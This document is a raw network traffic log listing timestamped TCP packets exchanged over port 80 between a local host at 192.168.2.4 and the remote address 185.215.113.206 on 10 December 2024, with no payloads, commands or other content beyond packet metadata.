Dec 10, 2024 00:42:07.341464043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.341504097 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.341516972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.341548920 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.342473030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.342521906 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.342545986 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.342588902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.343498945 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.343554020 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.343688965 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.343741894 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.344542027 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.344594002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.344646931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.344695091 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.345557928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.345628023 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.345662117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.345714092 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.346604109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.346657991 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.346689939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.346738100 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.347614050 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.347671032 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.347829103 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.347882986 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.348639011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.348690987 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.348706961 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.348754883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.349793911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.349843979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.349901915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.349950075 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.350760937 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.350812912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.350872040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.350922108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.351847887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.351897955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.351963997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.352015018 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.352768898 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.352819920 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.352879047 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.352925062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.353857040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.353913069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.353960037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.354011059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.354821920 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.354871988 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.354949951 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.354999065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.355865955 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.355927944 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.355982065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.356020927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.356894016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.356944084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.356972933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.357022047 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.357984066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.358037949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.358068943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.358117104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.358972073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.359023094 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.359083891 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.359137058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.360002995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.360049009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.360112906 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.360157967 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.361011028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.361064911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.399286985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.399308920 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.399770021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.399894953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.400095940 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.400821924 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.400876045 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.400928974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.400983095 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.401844025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.401896000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.401982069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.402034998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.402875900 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.402929068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.402957916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.403012037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.403964043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.404016972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.404129028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.404181957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.404941082 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.404989004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.405049086 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.405097008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.406054020 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.406104088 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.406136990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.406198025 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.407119989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.407202005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.407224894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.407277107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.408023119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.408077002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.408127069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.408189058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.409051895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.409107924 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.409159899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.409214020 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.410113096 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.410164118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.410195112 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.410243988 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.411123991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.411174059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.411232948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.411278963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.412174940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.412226915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.412230015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.412266970 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.413197041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.413248062 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.413310051 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.413360119 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.414211035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.414258957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.414335012 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.414385080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.415277958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.415328979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.415369987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.415417910 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.416290998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.416337013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.416423082 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.416470051 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.417334080 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.417383909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.417438984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.417490005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.418332100 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.418370962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.418421030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.468569040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.468635082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.468667984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.468733072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.469089985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.469145060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.469150066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.469194889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.470200062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.470252991 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.470415115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.470468044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.471132040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.471184015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.471193075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.471237898 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.472138882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.472189903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.472242117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.472302914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.473217964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.473269939 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.473297119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.473349094 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.474220037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.474275112 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.474342108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.474394083 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.475223064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.475281000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.475387096 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.475440979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.476267099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.476324081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.476356030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.476411104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.477303982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.477355957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.477418900 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.477471113 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.529895067 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.529973030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.529999971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.530098915 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.530165911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.530277967 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.530318975 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.530354023 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.531220913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.531275034 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.531305075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.531497955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.532218933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.532284021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.532383919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.532443047 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.533263922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.533324957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.533354998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.533390999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.534286022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.534437895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.534490108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.535322905 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.535435915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.535485029 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.536340952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.536391973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.536535025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.536578894 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.537390947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.537497997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.537621975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.538423061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.538486958 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.538516045 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.538602114 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.539448977 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.539506912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.539562941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.539603949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.540482998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.540570021 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.540599108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.540646076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.541511059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.541573048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.541604996 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.541690111 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.542519093 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.542711020 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.542759895 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.543579102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.543734074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.543782949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.544589996 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.544646025 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.544693947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.544735909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.545615911 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.545736074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.545783997 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.546637058 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.546684980 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.546783924 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.546824932 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.548000097 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.548042059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.548197031 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.548249960 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.549629927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.549678087 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.549824953 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.549869061 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.551069021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.551278114 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.551331997 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.552505016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.552556992 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.552560091 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.552603006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.553100109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.553142071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.553148985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.553179979 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.553497076 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.553508043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.553534985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.553560019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.591337919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.591384888 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.591509104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.591881990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.591938019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.591964960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.592014074 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.592881918 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.592931032 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.592977047 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.593024969 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.593905926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.593971968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.594002962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.594053030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.594957113 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.595005989 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.595036030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.595077038 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.595968962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.596014977 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.596071005 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.596118927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.596997023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.597053051 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.597115040 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.597162008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.598026037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.598074913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.598112106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.598155975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.599102974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.599149942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.599179983 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.599221945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.600111008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.600157976 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.600241899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.600285053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.601139069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.601182938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.601253986 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.601303101 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.602154016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.602202892 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.602313995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.602364063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.603197098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.603245974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.603306055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.603358030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.604232073 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.604302883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.604331017 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.604377985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.605249882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.605298996 CET	49730	80	192.168.2.4	185.215.113.206
